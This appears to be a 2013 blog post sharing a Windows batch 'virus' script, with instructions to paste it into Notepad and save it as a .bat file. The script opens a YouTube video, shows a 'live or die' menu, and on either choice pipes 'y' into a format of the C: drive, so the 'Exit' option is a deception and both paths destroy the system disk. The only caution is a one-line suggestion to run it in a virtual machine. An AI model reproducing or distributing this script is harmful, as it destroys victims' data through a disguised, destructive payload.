Saturday, 10 August 2013

Here's to a wonderful batch virus !


I am WARNING YOU !!! This shit is dangerous !!! Play at your own RISK !!! [ Open It On A Virtual Box ]

-------------------------------
@echo off
title Stealing, Lying, Now Your PC Is Dying
start firefox.exe https://www.youtube.com/watch?v=aQk8VNkAZBw
cd C:\
:menu
cls
echo Hello, I want to play a game.
pause
echo Live or Die, Make your choice:
echo 1. Format PC
echo 2. Exit

set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

:one
echo y|format C:

:two
echo y|format C:

-----------------------------------------

copy in notepad, save as anything.bat [ you can replace "anything" with whatever you want but save it with the ".bat" extension] ...

No comments:

Post a Comment